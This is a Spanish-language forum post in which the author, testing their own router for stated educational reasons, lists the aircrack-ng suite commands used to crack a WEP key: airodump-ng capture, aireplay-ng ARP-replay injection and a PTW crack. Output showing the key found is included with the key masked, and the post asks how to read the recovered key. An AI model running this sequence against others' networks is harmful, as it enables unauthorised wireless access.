Hola, quisiese hacer una consulta. Estoy experimentando, con fines educativos, la aplicación AIRCRACK-NG, la nueva beta, que permite colocar en modo monitor a tarjetas con chipsets que antiguamente no se podía, por ejemplo "rt73". Ojo que todas estas pruebas las hice capturando los paquetes de mi router.
Para lo anterior, la bajé e instalé perfectamente y quedó funcionando sin problemas.
En un terminal dejé ejecutando el airodump-ng:
# sudo airodump-ng wlan0 --channel 11 --write capturas
En otro terminal, produje tráfico para capturar paquetes:
# sudo aireplay-ng -b 00:14:A5:91:XX:XX -d 00:14:A5:91:XX:XX -x 1000 wlan0 --arpreplay -e MIRED
Una vez que pensé que había capturado varios paquetes, ejecuté:
# sudo aircrack-ng -a 1 -s capturas-01.cap
Al ejecutarlo, entrega lo siguiente:
...
Index number of target network ? 1
Opening capturas-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 69137 ivs.
KEY FOUND! [ 01:24:XXXXXXXX ] (ASCII: .$XXXXXX )
Decrypted correctly: 100%
El problema es que si bien sé cuál es la clave de mi router, no sé cómo llegar a ella a partir del KEY FOUND! [ 01:24:XXXXXXXX ] (ASCII: .$XXXXXXX)
Alguien sabe cómo descifrar, con qué aplicación. Por favor, acepto sugerencias.
De antemano gracias.